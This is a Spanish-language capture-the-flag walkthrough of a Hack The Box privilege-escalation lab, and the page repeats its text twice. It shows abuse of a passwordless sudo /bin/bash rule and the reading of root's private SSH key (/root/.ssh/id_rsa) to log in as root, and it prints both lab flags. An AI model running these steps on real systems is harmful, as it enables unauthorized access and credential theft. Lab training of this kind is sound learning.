![Tim Cook to Attend President Trump's Inauguration [Report]](https://www.iclarified.com/images/news/96130/96130/96130-640.jpg)
Walkthrough: Cómo resolver un laboratorio de escalada de privilegios en Hack The Box
A veces, resolver un laboratorio de escalada de privilegios parece más complicado de lo que realmente es. Este walkthrough te guiaré paso a paso para completar el reto sin que te marees. Lección clave: La solución muchas veces es más simple de lo que piensas, así que empieza siempre con lo básico. Paso 1: Conéctate al servidor Lo primero que debes hacer es conectarte al servidor usando las credenciales proporcionadas: ssh user1@ -p Verifica tu entorno inicial: ¿Quién eres?: Usa whoami para saber el usuario actual. ¿Dónde estás?: Usa pwd para conocer tu ubicación en el sistema. ¿Qué tienes alrededor?: Usa ls -la para explorar los archivos en tu directorio. Paso 2: Enumera permisos con sudo Una vez conectado, verifica qué permisos tienes como usuario inicial. Este paso es clave para descubrir posibles rutas de escalada: sudo -l Busca algo como esto: (user2 : user2) NOPASSWD: /bin/bash Esto indica que puedes ejecutar /bin/bash como user2 sin contraseña. Si ves algo similar, ¡vas por buen camino! Paso 3: Cambia al usuario user2 Aprovecha los permisos descubiertos en el paso anterior para convertirte en user2: sudo -u user2 /bin/bash Verifica que ahora estás operando como user2: whoami Paso 4: Encuentra la primera bandera Como user2, busca y lee el archivo flag.txt en el directorio de este usuario: cat /home/user2/flag.txt HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r} ¡Felicidades! Ya tienes la primera bandera. Ahora vamos por el acceso a root. Paso 5: Escala privilegios a root El objetivo final es obtener acceso como root. Aquí hay una posible estrategia: Busca el archivo de clave SSH de root: cat /root/.ssh/id_rsa Si tienes acceso a este archivo: Copia su contenido y guárdalo en tu máquina local en un archivo llamado id_rsa. Para ésto vas a escribir vim id_rsa Pegas el contenido del archivo y escribes wq para guardar los cambios y salir. Asegúrate de que el archivo tenga los permisos correctos: chmod 600 id_rsa Usa la clave para conectarte al servidor como root: ssh root@ -p -i id_rsa Paso 6: Encuentra la bandera de root Ahora que eres root, ve al directorio /root y lee el archivo flag.txt: cat /root/flag.txt HTB{pr1v1l363_35c4l4710n_2_r007} Laboratorio listo! Reflexiones finales Este laboratorio nos enseña algo importante: muchas veces, la solución más efectiva es también la más simple. Antes de complicarte con estrategias avanzadas, recuerda: Enumera lo básico: Comienza con comandos simples como sudo -l o ls -la. Explora opciones obvias: Aprovecha lo que ya tienes antes de buscar herramientas externas. Reflexiona después de cada reto: Cada experiencia es una oportunidad para mejorar. ¡Ahora es tu turno de aplicar este conocimiento y enfrentarte a nuevos desafíos con confianza!
A veces, resolver un laboratorio de escalada de privilegios parece más complicado de lo que realmente es. Este walkthrough te guiaré paso a paso para completar el reto sin que te marees.
Lección clave: La solución muchas veces es más simple de lo que piensas, así que empieza siempre con lo básico.
Paso 1: Conéctate al servidor
Lo primero que debes hacer es conectarte al servidor usando las credenciales proporcionadas:
ssh user1@ -p
Verifica tu entorno inicial:
- ¿Quién eres?: Usa whoami para saber el usuario actual.
- ¿Dónde estás?: Usa pwd para conocer tu ubicación en el sistema.
- ¿Qué tienes alrededor?: Usa ls -la para explorar los archivos en tu directorio.
Paso 2: Enumera permisos con sudo
Una vez conectado, verifica qué permisos tienes como usuario inicial. Este paso es clave para descubrir posibles rutas de escalada:
sudo -l
Busca algo como esto:
(user2 : user2) NOPASSWD: /bin/bash
Esto indica que puedes ejecutar /bin/bash como user2 sin contraseña. Si ves algo similar, ¡vas por buen camino!
Paso 3: Cambia al usuario user2
Aprovecha los permisos descubiertos en el paso anterior para convertirte en user2:
sudo -u user2 /bin/bash
Verifica que ahora estás operando como user2:
whoami
Paso 4: Encuentra la primera bandera
Como user2, busca y lee el archivo flag.txt en el directorio de este usuario:
cat /home/user2/flag.txt
HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}
¡Felicidades! Ya tienes la primera bandera. Ahora vamos por el acceso a root.
Paso 5: Escala privilegios a root
El objetivo final es obtener acceso como root. Aquí hay una posible estrategia:
Busca el archivo de clave SSH de root:
cat /root/.ssh/id_rsa
Si tienes acceso a este archivo:
Copia su contenido y guárdalo en tu máquina local en un archivo llamado id_rsa. Para ésto vas a escribir
vim id_rsa
Pegas el contenido del archivo y escribes wq para guardar los cambios y salir.
Asegúrate de que el archivo tenga los permisos correctos:
chmod 600 id_rsa
Usa la clave para conectarte al servidor como root:
ssh root@ -p -i id_rsa
Paso 6: Encuentra la bandera de root
Ahora que eres root, ve al directorio /root y lee el archivo flag.txt:
cat /root/flag.txt
HTB{pr1v1l363_35c4l4710n_2_r007}
Laboratorio listo!
Reflexiones finales
Este laboratorio nos enseña algo importante: muchas veces, la solución más efectiva es también la más simple. Antes de complicarte con estrategias avanzadas, recuerda:
- Enumera lo básico: Comienza con comandos simples como sudo -l o ls -la.
- Explora opciones obvias: Aprovecha lo que ya tienes antes de buscar herramientas externas.
- Reflexiona después de cada reto: Cada experiencia es una oportunidad para mejorar.
- ¡Ahora es tu turno de aplicar este conocimiento y enfrentarte a nuevos desafíos con confianza!
